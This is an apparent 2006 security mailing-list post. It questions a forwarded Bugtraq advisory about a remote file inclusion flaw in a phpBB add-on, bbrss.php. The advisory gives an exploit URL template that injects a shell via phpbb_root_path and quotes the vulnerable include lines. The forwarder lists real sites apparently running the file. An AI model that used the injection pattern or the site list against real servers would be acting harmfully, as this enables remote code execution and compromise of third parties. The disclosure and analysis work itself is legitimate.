[VIM] bbrss PhpBB (phpbb_root_path) Remote File Inclusion (fwd)

Mon Jul 24 18:46:30 EDT 2006

http://archives.neohapsis.com/archives/bugtraq/2006-06/0269.html
BID:18432

BID has labeled this "PhpBB BBRSS.PHP Remote File Include Vulnerability" 
but checking the 2.0.21 distro at http://www.phpbb.com/downloads.php finds 
no "bbrss.php" file in it.

If it is an add-on, it isn't immediately obvious in a Google search. There 
were a few hits showing such a file installed on remote hosts:

http://mywebland.com/forums/bbrss.php
 	
http://www.10.israel-forum.co.il/forum/bbrss.php
 	
http://www.reflectionsindia.org/bapuli/forum/bbrss.php
 	no html comment, but browse up one dir and it isn't a phpBB
 	install. http://www.reflectionsindia.org/bapuli/forum/
http://www.linuxjuegos.com/foro/bbrss.php
 	
http://www.faito.ru/forum/bbrss.php

Maybe relevant post with followup, but can't read:
http://www.iyuanma.com/Safety/9/8994_2006626203432.htm

Did anyone else do analysis? Secunia and SecTracker didn't include it 
seems.

---------- Forwarded message ----------
From: SpC-x at Bsdmail.Org
To: bugtraq at securityfocus.com
Date: 14 Jun 2006 04:56:46 -0000
Subject: bbrss PhpBB (phpbb_root_path) Remote File Inclusion

######################################################

# bbrss PhpBB (phpbb_root_path) Remote File Inclusion

######################################################

# Credit : SpC-x | The_BeKiR

# Site : http://wWw.SaVSaK.CoM

######################################################

# Greetz :

# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |

######################################################

Remote File Inclusion :

http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell

Bbrss.PHP :

define('IN_PHPBB', true); // to ensure your script works ! //
$phpbb_root_path = './';
include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.php');

/SpC-x